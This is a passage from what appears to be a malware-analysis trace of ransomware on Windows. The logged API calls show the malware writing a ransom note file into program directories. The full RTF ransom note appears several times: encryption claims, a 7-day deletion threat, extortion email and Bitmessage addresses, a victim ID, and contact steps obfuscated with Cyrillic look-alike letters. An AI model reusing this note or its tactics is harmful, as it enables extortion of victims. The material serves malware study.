party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0204.916] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef7aa8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x01zççÞ\x82Os\x98¦\x11\x1bÿÁ\x1e¨©®ÃU+(\x9c3>", lpUsedDefaultChar=0x0) returned 8717 [0204.916] WriteFile (in: hFile=0x2f8, lpBuffer=0x1ef7aa8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef7aa8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0204.917] CloseHandle (hObject=0x2f8) returned 1 [0204.917] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\#README_EMAN#.rtf" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\fonts\\#readme_eman#.rtf")) returned 0xffffffff [0204.917] GetLastError () returned 0x2 [0204.917] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\#README_EMAN#.rtf" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\fonts\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f8 [0204.918] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of 